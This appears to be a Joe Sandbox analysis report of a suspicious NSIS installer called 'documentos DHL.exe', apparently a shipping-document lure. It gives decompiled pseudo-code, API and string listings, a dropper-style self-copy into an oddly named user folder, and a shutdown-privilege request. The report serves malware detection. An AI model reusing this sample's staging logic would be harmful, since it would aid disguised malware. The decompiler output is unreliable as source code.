								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405A12( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a260 == _t151) {
							L47:
							 *0x42a30c =  *0x42a30c | 0xffffffff;
							 *(_t197 + 0x14) = E00403ABE( *0x42a30c);
							goto L48;
						}
						_t184 = E00405CAE(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040597D(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E00405960();
									} else {
										E004058E3();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes" - _t151; // 0x43
									if(_t243 == 0) {
										E004063B0(L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes", _t195);
									}
									E004063B0(L"540027183",  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									L"53936128" = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe", 0x420ee8, 1) != 0) {
											E00406176(_t156, 0x420ee8, _t151);
											E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x124)));
											_t103 = E00405995(0x420ee8);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										L"53936128" =  &(L"53936128"[0]);
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406176(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405D89(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E004063B0(L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes", _t185);
							E004063B0(L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes\\Tset\\Demodulationen\\Iagttagerposition", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E00403458(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E00403458(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x42a300 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E004063B0(L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405CAE(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E0040671A(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E0040678A(0xa);
					 *0x42a244 = E0040678A(8);
					_t56 = E0040678A(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a24f =  *0x42a24f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x00403494
0x00403495
0x0040349c
0x004034a0
0x004034a8
0x004034ac
0x004034b8
0x004034c1
0x004034c6
0x004034c9
0x004034d0
0x004034d7
0x004034d7
0x004034d0
0x004034d9
0x004034d9
0x00403521
0x00403522
0x00403529
0x0040352f
0x00403545
0x00403555
0x0040355a
0x00403560
0x00403567
0x0040357b
0x00403580
0x00403582
0x00403586
0x0040358b
0x0040358b
0x0040359a
0x0040359c
0x004035a0
0x004035a6
0x004036bd
0x004036c3
0x004036ce
0x004036d0
0x004036d5
0x004036d7
0x0040372f
0x00403734
0x0040373e
0x00403745
0x00403749
0x004037fa
0x004037fa
0x004037ff
0x00403805
0x0040380a
0x00403930
0x00403936
0x004039b4
0x004039b4
0x004039b9
0x004039bc
0x004039be
0x004039be
0x004039c6
0x004039c6
0x00403946
0x0040394c
0x0040394e
0x0040395b
0x0040396e
0x00403976
0x0040397e
0x0040397e
0x00403986
0x0040398b
0x00403992
0x004039a0
0x004039a3
0x004039a9
0x004039ab
0x00000000
0x00000000
0x00000000
0x00403994
0x0040399a
0x0040399c
0x0040399e
0x004039ad
0x004039af
0x00000000
0x004039af
0x00000000
0x0040399e
0x00403992
0x00403819
0x00403820
0x00403820
0x00403755
0x004037ea
0x004037ea
0x004037f6
0x00000000
0x004037f6
0x00403762
0x00403766
0x004037b4
0x004037b4
0x004037b6
0x004037be
0x00403831
0x00403833
0x0040383a
0x00403842
0x00403842
0x0040384d
0x00403852
0x00403861
0x00403865
0x00403866
0x0040386f
0x00403868
0x00403868
0x00403868
0x00403875
0x0040387b
0x00403882
0x0040388a
0x0040388a
0x00403898
0x004038a4
0x004038b2
0x004038b7
0x004038bd
0x004038c9
0x004038cf
0x004038d9
0x004038ef
0x00403900
0x00403906
0x0040390d
0x00403910
0x00403916
0x00403916
0x0040390d
0x0040391a
0x00403921
0x00403921
0x00403926
0x00403926
0x00000000
0x00403861
0x004037c0
0x004037c3
0x004037ce
0x00000000
0x00000000
0x004037d6
0x004037e1
0x004037e6
0x00000000
0x004037e6
0x0040376f
0x00403787
0x00403798
0x00403799
0x0040379d
0x0040379f
0x004037ad
0x004037b0
0x00000000
0x00000000
0x00000000
0x004037b0
0x004037b2
0x00000000
0x004037b2
0x004036df
0x004036eb
0x004036f0
0x004036f5
0x004036f7
0x00000000
0x00000000
0x004036ff
0x00403707
0x00403718
0x00403720
0x00403722
0x00403727
0x00403729
0x00000000
0x00000000
0x00000000
0x004035ac
0x004035ac
0x004035ae
0x004035b2
0x004035bb
0x004035bf
0x004035c4
0x004035c5
0x004035c5
0x004035ca
0x00000000
0x004035d0
0x004035d1
0x004035d6
0x004035d8
0x004035e0
0x004035e7
0x004035e7
0x004035e0
0x004035f8
0x0040360b
0x0040360c
0x00403621
0x00403626
0x0040362a
0x00403633
0x0040363b
0x00403642
0x00403642
0x0040363b
0x0040364e
0x00403661
0x00403662
0x00403677
0x0040367d
0x00403681
0x00000000
0x004036a8
0x004036a8
0x004036ad
0x004036b6
0x004036bb
0x004036bb
0x00000000
0x004036bb
0x00403681
0x00000000
0x00000000
0x00000000
0x004035b4
0x004035b4
0x004035b5
0x004035b6
0x00000000
0x00403689
0x00403690
0x00403696
0x00403699
0x00403699
0x0040369a
0x0040369d
0x00000000
0x004036a6
0x004034de
0x004034df
0x004034eb
0x004034f2
0x00000000
0x004034f4
0x004034f6
0x00403504
0x00403509
0x00403510
0x00403514
0x00403518
0x0040351a
0x0040351a
0x00403518
0x00000000
0x00403510

APIs

SetErrorMode.KERNELBASE ref: 004034AC
GetVersion.KERNEL32 ref: 004034B2
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
OleInitialize.OLE32(00000000), ref: 00403529
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\documentos DHL.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\documentos DHL.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EB
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403707
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
ExitProcess.KERNEL32 ref: 00403820
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403833
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403842
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040384D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\documentos DHL.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,540027183,00000008,?,00000006,00000008,0000000A), ref: 004038CF
CopyFileW.KERNEL32(C:\Users\user\Desktop\documentos DHL.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
OpenProcessToken.ADVAPI32(00000000), ref: 00403946
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
ExitProcess.KERNEL32 ref: 004039C6

Strings

TMP, xrefs: 0040371B
Error launching installer, xrefs: 004037B6
UXTHEME, xrefs: 004034D9, 004034DE, 004034E4
\Temp, xrefs: 004036E5
540027183, xrefs: 00403893
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes, xrefs: 004036B1, 004037D1, 0040387B, 00403885
C:\Users\user\Desktop\documentos DHL.exe, xrefs: 004038DE
Low, xrefs: 00403701
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition, xrefs: 004037DC
TEMP, xrefs: 00403713
C:\Users\user\Desktop, xrefs: 00403852, 00403857, 00403884
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034A0
~nsu, xrefs: 0040382B
NSIS Error, xrefs: 0040354B
.tmp, xrefs: 00403847
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00403560, 00403566, 0040375C
C:\Users\user\AppData\Local\Temp\, xrefs: 004036C3, 004036C8, 004036DE, 004036EA, 004036F9, 00403706, 00403712, 0040371A, 00403830, 00403841, 0040384C, 00403858, 00403865, 00403874, 00403925
SeShutdownPrivilege, xrefs: 00403955
1033, xrefs: 0040372F

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$.tmp$1033$540027183$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\documentos DHL.exe$C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes$C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3591316168
Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404D90 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404D90(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a288;
				_t282 = 0;
				_v24 =  *0x42a254 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a25d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404CDE(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a25c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2c0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a25d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404D5E();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a288;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a28c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404C99(0x3ff, 0xfffffffb, E00404CB1(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a28c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2c0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E00405388);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004063D2(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404345(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404345(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x423720 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a28c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040437A(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040437A(_v12);
								L91:
								return E004043AC(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404d9f
0x00404db0
0x00404db5
0x00404dbd
0x00404dc3
0x00404dcb
0x00404dd9
0x00404ddc
0x00404ffd
0x00405004
0x00405018
0x00405006
0x00405008
0x0040500b
0x0040500c
0x00405013
0x00405013
0x00405024
0x00405032
0x00405035
0x0040504b
0x004050c0
0x004050c3
0x004050c5
0x004050cf
0x004050dd
0x004050dd
0x004050df
0x004050e9
0x004050ef
0x004050f2
0x004050f5
0x00405110
0x004050f7
0x00405101
0x00405101
0x004050f5
0x004050e9
0x00000000
0x004050c3
0x00405050
0x0040505b
0x00405060
0x00405067
0x0040506c
0x00405070
0x0040507b
0x0040507b
0x0040507f
0x00405083
0x00405087
0x0040509a
0x00405089
0x00405089
0x00405090
0x00405096
0x00405092
0x00405092
0x00405092
0x00405090
0x0040509e
0x004050a0
0x004050b3
0x004050b6
0x004050b9
0x004050b9
0x00405083
0x00000000
0x00405070
0x00405052
0x00405059
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405113
0x00405113
0x0040511a
0x0040518b
0x00405193
0x0040519b
0x0040519b
0x004051a4
0x004051a6
0x004051ad
0x004051b0
0x004051b0
0x004051b6
0x004051bd
0x004051c0
0x004051c0
0x004051c6
0x004051cc
0x004051d2
0x004051d2
0x004051df
0x00405335
0x0040533c
0x00405359
0x0040535f
0x00405371
0x00405371
0x00000000
0x004051e5
0x004051e7
0x004051ec
0x004051f1
0x004051f6
0x004051f8
0x004051f8
0x004051f9
0x004051fa
0x004051fc
0x004051fc
0x00405204
0x00405245
0x00405247
0x00405257
0x0040525a
0x0040525f
0x00405266
0x00405269
0x0040530b
0x00405311
0x0040531f
0x00405330
0x00405330
0x00000000
0x0040531f
0x0040526f
0x00405272
0x00405278
0x0040527d
0x0040527f
0x00405281
0x00405287
0x0040528e
0x00405293
0x0040529a
0x0040529d
0x0040529d
0x004052a4
0x004052b0
0x004052b4
0x004052b6
0x004052b6
0x004052a6
0x004052a8
0x004052a8
0x004052d6
0x004052e2
0x004052f1
0x004052f1
0x004052f3
0x004052f6
0x004052ff
0x00000000
0x00405206
0x00405211
0x00405214
0x00405219
0x0040521b
0x0040521f
0x0040522f
0x00405239
0x0040523b
0x0040523e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405221
0x00405221
0x00405227
0x00405229
0x00405229
0x0040522a
0x0040522b
0x00000000
0x00405221
0x00405204
0x004051df
0x00405122
0x00000000
0x00405138
0x00405142
0x00405147
0x00000000
0x00000000
0x00405159
0x0040515e
0x0040516a
0x0040516a
0x0040516c
